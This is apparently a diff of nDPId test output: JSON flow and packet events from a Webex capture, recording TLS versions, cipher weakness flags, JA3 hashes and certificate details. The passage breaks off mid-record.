-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 
Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 
Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570624853,"flow_last_seen":1444570624853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570624853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628117,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628117,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
